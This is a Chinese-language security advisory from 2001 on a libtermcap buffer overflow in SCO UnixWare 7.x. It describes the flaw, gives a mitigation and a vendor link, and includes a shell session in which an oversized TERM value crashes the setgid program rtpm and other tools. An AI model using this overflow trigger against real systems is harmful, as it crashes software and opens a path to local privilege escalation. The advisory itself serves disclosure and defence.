发布日期：2001-06-12
更新日期：2001-06-22

受影响系统：

SCO Unixware 7.1.1
SCO Unixware 7.1
SCO Unixware 7.0.1
SCO Unixware 7.0

描述：

---

BUGTRAQ ID ： 2866

Libtermcap是一个基本的系统库，支持对termcap数据库的简单访问，很多与终端无关
的基于字符的应用程序都会用到它。

Unixware平台下的Libtermcap存在一个缓冲区溢出漏洞，本地用户可能通过攻击链接到
libtermcam的setuid程序来提升权限。

<*来源：Aycan Irican （ars.prosoft.com.tr）*>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Aycan Irican （ars.prosoft.com.tr）提供了下列测试代码：

$ uname -a
UnixWare paris 5 7.1.1 i386 x86at SCO UNIX_SVR5
(this is a two node NSC)

$ id
uid=101(fixxxer) gid=1(other)
$ ls -al /usr/sbin/rtpm
-r-xr-sr-x    1 bin      sys          288324 Mar 22 22:35 /usr/sbin/rtpm
$ export TERM=`perl -e 'printf "B"x4800'`
$ rtpm
Memory fault
$ bash
Memory fault(coredump)
$ vi
Memory fault(coredump)
$ ndcfg
Memory fault(coredump)
$ scoadmin
Fatal error: (vTcl interp) Connection closed unexpectedly - No Data
Error Information logged to: /tmp/tclerror.131977.log
$ more
Memory fault
$ man sendmail
/usr/bin/html2ascii: line 34: 132022: Memory fault
$ /usr/local/bin/less
Memory fault
$ /usr/local/bin/gdb rtpm
Memory fault


建议：

---

去掉所有使用libtermcap库的程序的suid/setgid属性。

厂商补丁：

目前厂商还没有提供补丁或者升级程序，但SCO说Unixware 8中将解决这些问题：
我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.sco.com/support/ftplists/index.html



浏览次数：3951
严重程度：0（网友投票）